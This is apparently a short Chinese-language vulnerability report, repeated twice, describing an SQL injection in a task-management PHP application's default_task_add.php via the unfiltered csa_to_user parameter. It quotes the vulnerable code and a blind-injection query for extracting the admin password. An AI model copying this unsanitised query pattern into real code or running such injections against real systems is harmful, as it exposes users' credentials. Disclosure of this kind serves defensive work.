VULHUB ™

### 简要描述： 參數未過濾 ### 详细说明： /wss/default_task_add.php? csa_to_user未過濾直接帶進SQL查詢 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201304/2119450024858be358de6fa15a2ec3a284f22860.jpg" alt="cc.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201304/2119450024858be358de6fa15a2ec3a284f22860.jpg) $to_user = "-1"; if (isset($_POST['csa_to_user'])) { $to_user= $_POST['csa_to_user']; } mysql_select_db($database_tankdb, $tankdb); $query_touser = "SELECT * FROM tk_user WHERE tk_user_login = '$to_user'"; $touser = mysql_query($query_touser, $tankdb) or die(mysql_error()); 可使用查詢使用者密碼 SELECT * FROM `tk_user` WHERE tk_user_login = 'admin' AND substring(`tk_user_pass`,1,1)='a'

### 简要描述： 參數未過濾 ### 详细说明： /wss/default_task_add.php? csa_to_user未過濾直接帶進SQL查詢 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201304/2119450024858be358de6fa15a2ec3a284f22860.jpg" alt="cc.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201304/2119450024858be358de6fa15a2ec3a284f22860.jpg) $to_user = "-1"; if (isset($_POST['csa_to_user'])) { $to_user= $_POST['csa_to_user']; } mysql_select_db($database_tankdb, $tankdb); $query_touser = "SELECT * FROM tk_user WHERE tk_user_login = '$to_user'"; $touser = mysql_query($query_touser, $tankdb) or die(mysql_error()); 可使用查詢使用者密碼 SELECT * FROM `tk_user` WHERE tk_user_login = 'admin' AND substring(`tk_user_pass`,1,1)='a'